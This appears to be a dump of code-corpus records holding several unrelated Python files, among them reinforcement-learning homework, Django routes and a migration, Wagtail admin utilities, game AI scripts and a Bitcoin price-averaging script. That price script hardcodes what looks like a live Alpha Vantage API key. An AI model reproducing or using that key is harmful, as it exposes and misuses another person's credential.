zxzxzFLD2, , , , , ], [, zxzxzFLD3, , , , , ]]')\r\n\t\tassert_p('RecordDef.Record Name_Txt', 'Text', 'zxzxzFLDg1')\r\n\t\tclick('BasicInternalFrameTitlePane$NoFocusButton2')\r\n\tclose()\r\n","sub_path":"Build/Instalation/GeneralDb/Marathon/MarathonTests_1.1/HSQLDB_LayoutEdit_ForeignLanguage/TestCases/B_NamedFields/Create_GroupLayout1/AA3_CreateFlds3b.py","file_name":"AA3_CreateFlds3b.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"446871645","text":"# Names: Sofia McKerrow and Wenpeng Jiang\n# Student IDs: s3626804, s3674270\n\n### MDP Value Iteration and Policy Iteration\n### Acknowledgement: start-up codes were adapted with permission from Prof. 
Emma Brunskill of Stanford University\n\nimport numpy as np\nimport gym\nimport time\nimport rmit_rl_env\n\nnp.set_printoptions(precision=3)\n\n\"\"\"\nFor policy_evaluation, policy_improvement, policy_iteration and value_iteration,\nthe parameters P, nS, nA, gamma are defined as follows:\n\n\tP: nested dictionary\n\t\tFrom gym.core.Environment\n\t\tFor each pair of states in [1, nS] and actions in [1, nA], P[state][action] is a\n\t\ttuple of the form (probability, nextstate, reward, terminal) where\n\t\t\t- probability: float\n\t\t\t\tthe probability of transitioning from \"state\" to \"nextstate\" with \"action\"\n\t\t\t- nextstate: int\n\t\t\t\tdenotes the state we transition to (in range [0, nS - 1])\n\t\t\t- reward: int\n\t\t\t\teither 0 or 1, the reward for transitioning from \"state\" to\n\t\t\t\t\"nextstate\" with \"action\"\n\t\t\t- terminal: bool\n\t\t\t True when \"nextstate\" is a terminal state (hole or goal), False otherwise\n\tnS: int\n\t\tnumber of states in the environment\n\tnA: int\n\t\tnumber of actions in the environment\n\tgamma: float\n\t\tDiscount factor. Number in range [0, 1)\n\"\"\"\n\ndef policy_evaluation(P, nS, nA, policy, gamma=0.9, tol=1e-3):\n\t\"\"\"Evaluate the value function from a given policy.\n\n\tParameters\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\tpolicy: np.array[nS]\n\t\tThe policy to evaluate. Maps states to actions.\n\ttol: float\n\t\tTerminate policy evaluation when\n\t\t\tmax |value_function(s) - prev_value_function(s)| < tol\n\tReturns\n\t-------\n\tvalue_function: np.ndarray[nS]\n\t\tThe value function of the given policy, where value_function[s] is\n\t\tthe value of state s\n\t\"\"\"\n\n\tvalue_function = np.zeros(nS)\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\t\n\twhile True:\n\t\told_value_function = np.copy(value_function)\n\n\t\t# iterate through each state\n\t\tfor state in range(nS):\n\t\t\tpolicy_action = policy[state]\n\t\t\t# calculate the value function under the policy\n\t\t\tvalue_function[state] = sum([prob * (reward + gamma * old_value_function[next_state]) \\\n\t\t\t\tfor prob, next_state, reward, terminal in P[state][policy_action]])\n\n\t\t# if values have converged, stop iterations\n\t\tif (np.sum((np.fabs(old_value_function - value_function))) <= tol):\n\t\t\tbreak\n\n\t############################\n\t\n\treturn value_function\n\ndef policy_improvement(P, nS, nA, value_from_policy, policy, gamma=0.9):\n\t\"\"\"Given the value function from policy improve the policy.\n\n\tParameters\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\tvalue_from_policy: np.ndarray\n\t\tThe value calculated from the policy\n\tpolicy: np.array\n\t\tThe previous policy.\n\n\tReturns\n\t-------\n\tnew_policy: np.ndarray[nS]\n\t\tAn array of integers. 
Each integer is the optimal action to take\n\t\tin that state according to the environment dynamics and the\n\t\tgiven value function.\n\t\"\"\"\n\n\tnew_policy = np.zeros(nS, dtype='int')\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\n\t# iterate through each state\n\tdef one_step_look_ahead(P, state, nA, value_from_policy, gamma=0.9):\n\t\taction_values = np.zeros(nA)\n\n\t\tfor action in range(nA):\n\t\t\tfor prob,next_state,reward,terminal in P[state][action]:\n\t\t\t\t#sum value of all possible state in with action\n\t\t\t\taction_values[action] += prob * (reward + (gamma * value_from_policy[next_state]))\n\t\treturn action_values\n\n\tfor state in range(nS):\n\t\t#one step look ahead\n\t\taction_values = one_step_look_ahead(P, state, nA, value_from_policy, gamma)\n\t\tnew_policy[state] = np.argmax(action_values)\n\t\n\t############################\n\t\n\treturn new_policy\n\n\ndef policy_iteration(P, nS, nA, gamma=0.9, tol=10e-3):\n\t\"\"\"Runs policy iteration.\n\n\tYou should call the policy_evaluation() and policy_improvement() methods to\n\timplement this method.\n\n\tParameters\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\ttol: float\n\t\ttol parameter used in policy_evaluation()\n\tReturns:\n\t----------\n\tvalue_function: np.ndarray[nS]\n\tpolicy: np.ndarray[nS]\n\t\"\"\"\n\n\tvalue_function = np.zeros(nS)\n\tpolicy = np.zeros(nS, dtype=int)\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\n\tmax_iterations = 100000\n\t\n\tfor i in range(max_iterations):\n\t\t# get state value function for policy\n\t\tvalue_function = policy_evaluation(P, nS, nA, policy, gamma, tol)\n\t\t# use the state value function to improve the policy\n\t\tnew_policy = policy_improvement(P, nS, nA, value_function, policy, gamma)\n\n\t\t# check if the policy has converged\n\t\tif (np.all(policy == new_policy)):\n\t\t\tprint ('Policy converged in %d iterations.' 
%(i+1))\n\t\t\tbreak\n\t\t\n\t\t# update the policy\n\t\tpolicy = new_policy\n\n\t############################\n\t\n\treturn value_function, policy\n\ndef value_iteration(P, nS, nA, gamma=0.9, tol=1e-3):\n\t\"\"\"\n\tLearn value function and policy by using value iteration method for a given\n\tgamma and environment.\n\n\tParameters:\n\t----------\n\tP, nS, nA, gamma:\n\t\tdefined at beginning of file\n\ttol: float\n\t\tTerminate value iteration when\n\t\t\tmax |value_function(s) - prev_value_function(s)| < tol\n\tReturns:\n\t----------\n\tvalue_function: np.ndarray[nS]\n\tpolicy: np.ndarray[nS]\n\t\"\"\"\n\n\tvalue_function = np.zeros(nS)\n\tpolicy = np.zeros(nS, dtype=int)\n\n\t############################\n\t# YOUR IMPLEMENTATION HERE #\n\n\tmax_iterations = 200000\n\t\n\tfor i in range(max_iterations):\n\t\t# stopping condition\n\t\tdelta = 0\n\n\t\t# iterate through each state\n\t\tfor state in range(nS):\n\t\t\tactions_values = np.zeros(nA)\n\n\t\t\t# loop over possible actions\n\t\t\tfor act in range(nA):\n\t\t\t\tfor prob, next_state, reward, done in P[state][act]:\n\t\t\t\t\t# use Bellman equation to get action values\n\t\t\t\t\tactions_values[act] += prob * (reward + gamma * value_function[next_state])\n\n\t\t\t# get the highest action value\n\t\t\tbest_action_value = max(actions_values)\n\n\t\t\t# get the biggest difference between best action value and the previous value function\n\t\t\tdelta = max(delta, abs(best_action_value - value_function[state]))\n\n\t\t\t# update value function for the current state\n\t\t\tvalue_function[state] = best_action_value\n\n\t\t\t# update the policy based on the best action\n\t\t\tbest_action = np.argmax(actions_values)\n\t\t\tpolicy[state] = best_action\n\t\t\n\t\t# check if the values have reached convergence -> iterations can stop\n\t\tif delta < tol * (1 - gamma) / gamma:\n\t\t\tprint ('Value iteration converged in %d iterations.' %(i+1))\n\t\t\tbreak\n\n\t############################\n\n\treturn value_function, policy\n\ndef render_single(env, policy, max_steps=100):\n \"\"\"\n This function does not need to be modified\n Renders policy once on environment. Watch your agent play!\n\n Parameters\n ----------\n env: gym.core.Environment\n Environment to play on. 
Must have nS, nA, and P as\n        attributes.\n    Policy: np.array of shape [env.nS]\n        The action to take at a given state\n    \"\"\"\n\n    episode_reward = 0\n    ob = env.reset()\n    for t in range(max_steps):\n        env.render()\n        time.sleep(0.25)\n        a = policy[ob]\n        ob, rew, done, _ = env.step(a)\n        episode_reward += rew\n        if done:\n            break\n    env.render()\n    if not done:\n        print(\"The agent didn't reach a terminal state in {} steps.\".format(max_steps))\n    else:\n        print(\"Episode reward: %f\" % episode_reward)\n\n\n# Edit below to run policy and value iteration on different environments and\n# visualize the resulting policies in action!\n# You may change the parameters in the functions below\nif __name__ == \"__main__\":\n\n\t# comment/uncomment these lines to switch between deterministic/stochastic environments\n\t# env = gym.make(\"Deterministic-4x4-FrozenLake-v0\")\n\tenv = gym.make(\"Stochastic-4x4-FrozenLake-v0\")\n\n\tprint(\"\\n\" + \"-\"*25 + \"\\nBeginning Policy Iteration\\n\" + \"-\"*25)\n\n\tV_pi, p_pi = policy_iteration(env.P, env.nS, env.nA, gamma=0.9, tol=1e-3)\n\trender_single(env, p_pi, 100)\n\n\tprint(\"\\n\" + \"-\"*25 + \"\\nBeginning Value Iteration\\n\" + \"-\"*25)\n\n\tV_vi, p_vi = value_iteration(env.P, env.nS, env.nA, gamma=0.9, tol=1e-3)\n\trender_single(env, p_vi, 100)\n\n\n","sub_path":"vi_and_pi.py","file_name":"vi_and_pi.py","file_ext":"py","file_size_in_byte":7906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"163631869","text":"from django.urls import path\nfrom .views import *\n\napp_name = 'employee'\n\n# connect the views.py functions to URLs\nurlpatterns = [\n    path('',employee_all, name='employee_all'),\n    path('new/',new_feed, name='new_feed'),\n    # NOTE: the '<int:feed_id>' converter below is an assumption; the original\n    # angle-bracketed parameter was lost in extraction\n    path('feed/<int:feed_id>/', detail_feed),\n    path('feed/<int:feed_id>/remove/', remove_feed),\n    path('feed/<int:feed_id>/edit/', edit_feed),\n    path('home/', sort1, name='home'),\n    path('load/',sort2, name='load'),\n    path('pet/',sort3, name='pet'),\n    path('acting/',sort4, name='acting'),\n    path('short/',sort5, name='short'),\n    path('carpool/',sort6, name='carpool'),\n    path('etc/',sort7, name='etc'),\n]\n\n","sub_path":"employee/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"520705162","text":"import math\n\ndef isPrime(n):\n    i = 2\n    while i <= math.sqrt(n):\n        if n % i == 0:\n            return False\n        i += 1\n    return True\n\ndef isCarmichael(n):\n    if isPrime(n):\n        return False\n    for i in range(1, n):\n        # modular exponentiation keeps the intermediate values small\n        if pow(i, n, n) == i:\n            continue\n        else:\n            return False\n    return True\n\ndef main():\n    n = int(input('Enter n: '))\n    # count from 0 so exactly n Carmichael numbers are printed\n    count = 0\n    curr = 0\n    while count < n:\n        curr += 1\n        if isCarmichael(curr):\n            count += 1\n            print(curr)\n\nmain()\n","sub_path":"Carmichael Numbers/carmichael.py","file_name":"carmichael.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"226208966","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport geoposition.fields\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Descriptions',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('description', models.TextField()),\n                ('type', models.CharField(max_length=200)),\n                ('language', models.CharField(max_length=200, choices=[(b'en', b'English'), (b'ru', b'Russian'), 
(b'gr', b'Greek')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Extraattrs',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.CharField(max_length=200)),\n ('type', models.CharField(max_length=200)),\n ('language', models.CharField(max_length=200, choices=[(b'en', b'English'), (b'ru', b'Russian'), (b'gr', b'Greek')])),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='House',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('sku', models.CharField(max_length=200)),\n ('name', models.CharField(max_length=200)),\n ('square_meters', models.CharField(max_length=200)),\n ('bedrooms', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('bathrooms', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('livingrooms', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('storage', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('levels', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('balconi', models.IntegerField(choices=[(1, b'1'), (2, b'2'), (3, b'3'), (4, b'4'), (5, b'5'), (6, b'6'), (7, b'7')])),\n ('energy_class', models.CharField(max_length=200, choices=[(b'A', b'A'), (b'B', b'B'), (b'C', b'C'), (b'E', b'E')])),\n ('barbeque', models.BooleanField(default=False)),\n ('pool', models.BooleanField(default=False)),\n ('security_system', models.BooleanField(default=False)),\n ('inner_stairs', models.BooleanField(default=False)),\n ('outer_stairs', models.BooleanField(default=False)),\n ('garden_stairs', models.BooleanField(default=False)),\n ('security_system_info', models.TextField()),\n ('ouside_short_info', models.TextField()),\n ('ouside_short_info_de', models.TextField(null=True)),\n ('ouside_short_info_en', models.TextField(null=True)),\n ('ouside_short_info_el', models.TextField(null=True)),\n ('inside_short_info', models.TextField()),\n ('garden_area_info', models.TextField()),\n ('location', geoposition.fields.GeopositionField(max_length=42)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('description', models.TextField()),\n ('image', models.ImageField(upload_to=b'PhotoGallery')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='PhotoGallery',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=200)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Price',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('type', models.CharField(max_length=200)),\n ('value', models.CharField(max_length=200)),\n ('per_sqrm', models.CharField(max_length=200)),\n ('start_date', models.CharField(max_length=200)),\n ('end_date', models.CharField(max_length=200)),\n ('currency', models.CharField(max_length=200, choices=[(b'dollar', b'$'), (b'pound', b'POUND'), (b'euro', b'EURO')])),\n 
('property', models.ForeignKey(to='houses.House')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='photo',\n name='photoGallery',\n field=models.ForeignKey(to='houses.PhotoGallery'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='extraattrs',\n name='property',\n field=models.ForeignKey(to='houses.House'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='descriptions',\n name='photoGallery',\n field=models.ForeignKey(to='houses.PhotoGallery'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='descriptions',\n name='property',\n field=models.ForeignKey(to='houses.House'),\n preserve_default=True,\n ),\n migrations.AlterUniqueTogether(\n name='descriptions',\n unique_together=set([('property', 'type', 'language')]),\n ),\n ]\n","sub_path":"houses/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"395490413","text":"# To convert the interpro output to uniprot retrieve id list\n\nFILE = \"AAA_interpro.txt\"\nOUT = \"AAA_uniprot.txt\"\n\noutfile = open(OUT,'w')\n\nwith open(FILE) as file:\n for line in file.readlines():\n line = line.strip().split('\\t')\n id_acc,pos = line[0],line[-1]\n for p in pos.split(','):\n p = p.replace('..','-')\n outfile.write(f'{id_acc}[{p}]\\n')","sub_path":"Article-20210106/get_AAA/process_interpro_output.py","file_name":"process_interpro_output.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"415909456","text":"import App\ndef CreateAI(pShip, pTargetGroup):\n\n\t#########################################\n\t# Creating PlainAI WarpToSavoy3 at (65, 182)\n\tpWarpToSavoy3 = App.PlainAI_Create(pShip, \"WarpToSavoy3\")\n\tpWarpToSavoy3.SetScriptModule(\"Warp\")\n\tpWarpToSavoy3.SetInterruptable(1)\n\tpScript = pWarpToSavoy3.GetScriptInstance()\n\tpScript.SetDestinationSetName(\"Systems.Savoy.Savoy3\")\n\tpScript.SetDestinationPlacementName(\"VentureEnter\")\n\t# Done creating PlainAI WarpToSavoy3\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI NotInSavoy3 at (64, 262)\n\t## Conditions:\n\t#### Condition InSavoy3\n\tpInSavoy3 = App.ConditionScript_Create(\"Conditions.ConditionInSet\", \"ConditionInSet\", pShip.GetName(), \"Savoy3\")\n\t## Evaluation function:\n\tdef EvalFunc(bInSavoy3):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif (bInSavoy3):\n\t\t\treturn DONE\n\t\treturn ACTIVE\n\t## The ConditionalAI:\n\tpNotInSavoy3 = App.ConditionalAI_Create(pShip, \"NotInSavoy3\")\n\tpNotInSavoy3.SetInterruptable(1)\n\tpNotInSavoy3.SetContainedAI(pWarpToSavoy3)\n\tpNotInSavoy3.AddCondition(pInSavoy3)\n\tpNotInSavoy3.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI NotInSavoy3\n\t#########################################\n\t#########################################\n\t# Creating PlainAI Call_VentureTakingDamage at (166, 181)\n\tpCall_VentureTakingDamage = App.PlainAI_Create(pShip, \"Call_VentureTakingDamage\")\n\tpCall_VentureTakingDamage.SetScriptModule(\"RunScript\")\n\tpCall_VentureTakingDamage.SetInterruptable(1)\n\tpScript = 
pCall_VentureTakingDamage.GetScriptInstance()\n\tpScript.SetScriptModule(\"Maelstrom.Episode6.E6M1.E6M1\")\n\tpScript.SetFunction(\"VentureTakingDamage\")\n\t# Done creating PlainAI Call_VentureTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating ConditionalAI HullTakingDamage at (163, 263)\n\t## Conditions:\n\t#### Condition HullAt80\n\tpHullAt80 = App.ConditionScript_Create(\"Conditions.ConditionSystemBelow\", \"ConditionSystemBelow\", pShip.GetName(), App.CT_HULL_SUBSYSTEM, 0.80)\n\t## Evaluation function:\n\tdef EvalFunc(bHullAt80):\n\t\tACTIVE = App.ArtificialIntelligence.US_ACTIVE\n\t\tDORMANT = App.ArtificialIntelligence.US_DORMANT\n\t\tDONE = App.ArtificialIntelligence.US_DONE\n\t\tif (bHullAt80):\n\t\t\treturn ACTIVE\n\t\treturn DORMANT\n\t## The ConditionalAI:\n\tpHullTakingDamage = App.ConditionalAI_Create(pShip, \"HullTakingDamage\")\n\tpHullTakingDamage.SetInterruptable(1)\n\tpHullTakingDamage.SetContainedAI(pCall_VentureTakingDamage)\n\tpHullTakingDamage.AddCondition(pHullAt80)\n\tpHullTakingDamage.SetEvaluationFunction(EvalFunc)\n\t# Done creating ConditionalAI HullTakingDamage\n\t#########################################\n\t#########################################\n\t# Creating CompoundAI BasicAttackAllTargets at (270, 266)\n\timport AI.Compound.BasicAttack\n\tpBasicAttackAllTargets = AI.Compound.BasicAttack.CreateAI(pShip, pTargetGroup, Difficulty = 0.65)\n\t# Done creating CompoundAI BasicAttackAllTargets\n\t#########################################\n\t#########################################\n\t# Creating PriorityListAI PriorityList at (104, 362)\n\tpPriorityList = App.PriorityListAI_Create(pShip, \"PriorityList\")\n\tpPriorityList.SetInterruptable(1)\n\t# SeqBlock is at (194, 357)\n\tpPriorityList.AddAI(pNotInSavoy3, 1)\n\tpPriorityList.AddAI(pHullTakingDamage, 2)\n\tpPriorityList.AddAI(pBasicAttackAllTargets, 3)\n\t# Done creating PriorityListAI PriorityList\n\t#########################################\n\t#########################################\n\t# Creating PreprocessingAI AvoidObstacles at (11, 356)\n\t## Setup:\n\timport AI.Preprocessors\n\tpScript = AI.Preprocessors.AvoidObstacles()\n\t## The PreprocessingAI:\n\tpAvoidObstacles = App.PreprocessingAI_Create(pShip, \"AvoidObstacles\")\n\tpAvoidObstacles.SetInterruptable(1)\n\tpAvoidObstacles.SetPreprocessingMethod(pScript, \"Update\")\n\tpAvoidObstacles.SetContainedAI(pPriorityList)\n\t# Done creating PreprocessingAI AvoidObstacles\n\t#########################################\n\treturn pAvoidObstacles\n","sub_path":"scripts/Maelstrom/Episode6/E6M1/E6M1_AI_Venture_Savoy3.py","file_name":"E6M1_AI_Venture_Savoy3.py","file_ext":"py","file_size_in_byte":4083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"6021059","text":"from __future__ import absolute_import, unicode_literals\n\nimport logging\nfrom functools import wraps\n\nfrom django.conf import settings\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.core.mail import send_mail as django_send_mail\nfrom django.db.models import Count, Q\nfrom django.shortcuts import redirect\nfrom django.template.loader import render_to_string\nfrom django.utils.translation import ugettext as _\nfrom modelcluster.fields import ParentalKey\nfrom taggit.models import Tag\n\nfrom wagtail.wagtailcore.models import GroupPagePermission, Page, PageRevision\nfrom wagtail.wagtailusers.models import 
UserProfile\n\nlogger = logging.getLogger('wagtail.admin')\n\n\ndef get_object_usage(obj):\n \"Returns a queryset of pages that link to a particular object\"\n\n pages = Page.objects.none()\n\n # get all the relation objects for obj\n relations = [f for f in type(obj)._meta.get_fields(include_hidden=True)\n if (f.one_to_many or f.one_to_one) and f.auto_created]\n for relation in relations:\n related_model = relation.related_model\n\n # if the relation is between obj and a page, get the page\n if issubclass(related_model, Page):\n pages |= Page.objects.filter(\n id__in=related_model._base_manager.filter(**{\n relation.field.name: obj.id\n }).values_list('id', flat=True)\n )\n else:\n # if the relation is between obj and an object that has a page as a\n # property, return the page\n for f in related_model._meta.fields:\n if isinstance(f, ParentalKey) and issubclass(f.rel.to, Page):\n pages |= Page.objects.filter(\n id__in=related_model._base_manager.filter(\n **{\n relation.field.name: obj.id\n }).values_list(f.attname, flat=True)\n )\n\n return pages\n\n\ndef popular_tags_for_model(model, count=10):\n \"\"\"Return a queryset of the most frequently used tags used on this model class\"\"\"\n content_type = ContentType.objects.get_for_model(model)\n return Tag.objects.filter(\n taggit_taggeditem_items__content_type=content_type\n ).annotate(\n item_count=Count('taggit_taggeditem_items')\n ).order_by('-item_count')[:count]\n\n\ndef users_with_page_permission(page, permission_type, include_superusers=True):\n # Get user model\n User = get_user_model()\n\n # Find GroupPagePermission records of the given type that apply to this page or an ancestor\n ancestors_and_self = list(page.get_ancestors()) + [page]\n perm = GroupPagePermission.objects.filter(permission_type=permission_type, page__in=ancestors_and_self)\n q = Q(groups__page_permissions__in=perm)\n\n # Include superusers\n if include_superusers:\n q |= Q(is_superuser=True)\n\n return User.objects.filter(is_active=True).filter(q).distinct()\n\n\ndef permission_denied(request):\n \"\"\"Return a standard 'permission denied' response\"\"\"\n from wagtail.wagtailadmin import messages\n\n messages.error(request, _('Sorry, you do not have permission to access this area.'))\n return redirect('wagtailadmin_home')\n\n\ndef user_passes_test(test):\n \"\"\"\n Given a test function that takes a user object and returns a boolean,\n return a view decorator that denies access to the user if the test returns false.\n \"\"\"\n def decorator(view_func):\n # decorator takes the view function, and returns the view wrapped in\n # a permission check\n\n @wraps(view_func)\n def wrapped_view_func(request, *args, **kwargs):\n if test(request.user):\n # permission check succeeds; run the view function as normal\n return view_func(request, *args, **kwargs)\n else:\n # permission check failed\n return permission_denied(request)\n\n return wrapped_view_func\n\n return decorator\n\n\ndef permission_required(permission_name):\n \"\"\"\n Replacement for django.contrib.auth.decorators.permission_required which returns a\n more meaningful 'permission denied' response than just redirecting to the login page.\n (The latter doesn't work anyway because Wagtail doesn't define LOGIN_URL...)\n \"\"\"\n def test(user):\n return user.has_perm(permission_name)\n\n # user_passes_test constructs a decorator function specific to the above test function\n return user_passes_test(test)\n\n\ndef any_permission_required(*perms):\n \"\"\"\n Decorator that accepts a list of permission names, and 
allows the user\n to pass if they have *any* of the permissions in the list\n \"\"\"\n def test(user):\n for perm in perms:\n if user.has_perm(perm):\n return True\n\n return False\n\n return user_passes_test(test)\n\n\nclass PermissionPolicyChecker(object):\n \"\"\"\n Provides a view decorator that enforces the given permission policy,\n returning the wagtailadmin 'permission denied' response if permission not granted\n \"\"\"\n def __init__(self, policy):\n self.policy = policy\n\n def require(self, action):\n def test(user):\n return self.policy.user_has_permission(user, action)\n\n return user_passes_test(test)\n\n def require_any(self, *actions):\n def test(user):\n return self.policy.user_has_any_permission(user, actions)\n\n return user_passes_test(test)\n\n\ndef send_mail(subject, message, recipient_list, from_email=None, **kwargs):\n if not from_email:\n if hasattr(settings, 'WAGTAILADMIN_NOTIFICATION_FROM_EMAIL'):\n from_email = settings.WAGTAILADMIN_NOTIFICATION_FROM_EMAIL\n elif hasattr(settings, 'DEFAULT_FROM_EMAIL'):\n from_email = settings.DEFAULT_FROM_EMAIL\n else:\n from_email = 'webmaster@localhost'\n\n return django_send_mail(subject, message, from_email, recipient_list, **kwargs)\n\n\ndef send_notification(page_revision_id, notification, excluded_user_id):\n # Get revision\n revision = PageRevision.objects.get(id=page_revision_id)\n\n # Get list of recipients\n if notification == 'submitted':\n # Get list of publishers\n recipients = users_with_page_permission(revision.page, 'publish')\n elif notification in ['rejected', 'approved']:\n # Get submitter\n recipients = [revision.user]\n else:\n return False\n\n # Get list of email addresses\n email_recipients = [\n recipient for recipient in recipients\n if recipient.email and recipient.pk != excluded_user_id and getattr(\n UserProfile.get_for_user(recipient),\n notification + '_notifications'\n )\n ]\n\n # Return if there are no email addresses\n if not email_recipients:\n return True\n\n # Get template\n template_subject = 'wagtailadmin/notifications/' + notification + '_subject.txt'\n template_text = 'wagtailadmin/notifications/' + notification + '.txt'\n template_html = 'wagtailadmin/notifications/' + notification + '.html'\n\n # Common context to template\n context = {\n \"revision\": revision,\n \"settings\": settings,\n }\n\n # Send emails\n sent_count = 0\n for recipient in email_recipients:\n try:\n # update context with this recipient\n context[\"user\"] = recipient\n\n # Get email subject and content\n email_subject = render_to_string(template_subject, context).strip()\n email_content = render_to_string(template_text, context).strip()\n\n kwargs = {}\n if getattr(settings, 'WAGTAILADMIN_NOTIFICATION_USE_HTML', False):\n kwargs['html_message'] = render_to_string(template_html, context)\n\n # Send email\n send_mail(email_subject, email_content, [recipient.email], **kwargs)\n sent_count += 1\n except Exception:\n logger.exception(\n \"Failed to send notification email '%s' to %s\",\n email_subject, recipient.email\n )\n\n return sent_count == len(email_recipients)\n","sub_path":"wagtail/wagtailadmin/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"66362733","text":"#!/usr/bin/env python\n\nfrom alpha_vantage.cryptocurrencies import CryptoCurrencies\nimport pandas as pd\nimport datetime\n\ncc = CryptoCurrencies(key='DD47SAS6ASI0WQFD', output_format='pandas')\n\noriginal_data, meta_data = 
cc.get_digital_currency_daily(symbol='BTC', market='USD')\n\n## Data agg per week (Monday to Sunday):\n\n# for readability purposes, use dataframe (df) instead of data\ndf = original_data.copy()\n\n# Prepare the datetime to be indexed for the avg reduction\ndf[\"datetime\"] = pd.to_datetime(df.index, format='%Y-%m-%d %H:%M:%S')\ndf[\"date_minus_time\"] = df[\"datetime\"].apply(lambda x: datetime.datetime(year=x.year, month=x.month, day=x.day))\n\n# Change the index\ndf.set_index(df[\"date_minus_time\"], inplace=True)\n\n# Resample the data with the weekly averages\ndfmean = df.groupby(pd.Grouper(key='date_minus_time', freq='W-MON', closed='left', label='left'))['4a. close (USD)'].mean()\ndfmean.to_csv('output/USD_BTC_WEEK_MEAN.csv')\n\n# Relative span ('min'/'max' must be accessed as columns; attribute access would resolve to the DataFrame methods)\ndfminmax = df.groupby(pd.Grouper(key='date_minus_time', freq='W-MON', closed='left', label='left'))['4a. close (USD)'].agg(['min', 'max'])\ndfminmax['weekly span'] = ((dfminmax['max'] - dfminmax['min'])/dfminmax['min'])\ndfminmax = dfminmax.sort_values(by=['weekly span'], ascending=False)\ndfminmax.to_csv('output/USD_BTC_WEEKLY_SPAN.csv')\n","sub_path":"letsgetrich.py","file_name":"letsgetrich.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"649766439","text":"import Races.Race as r\nimport Stats as s\n\ndef chooseToolProficiency(toolName: str = \"empty\") -> str:\n    toolName = toolName.lower()\n    if(toolName == \"smith's tools\" or toolName == \"brewer's supplies\" or toolName == \"mason's tools\"):\n        return toolName\n    else:\n        print(\"Choose from the following tools:\")\n        toolname = str(input(\"smith's tools; brewer's supplies; or mason's tools: \"))\n        return chooseToolProficiency(toolname)\n\n\nclass Dwarf(r.Race):\n    def __init__(self, age: int=50, alignment: str=\"lawful good\",\n                 height: int=48, stats: s.Stats=s.Stats(),\n                 subrace: str=\"hill\", weight: int=150,\n                 gender: str=\"male\", firstName: str=\"Adrik\",\n                 lastName: str=\"Balderk\"):\n        super().__init__(\"dwarf\", age, alignment, height,\n                         \"common dwarvish\", \"medium\", stats, 25,\n                         subrace, weight, gender, firstName,\n                         lastName)\n        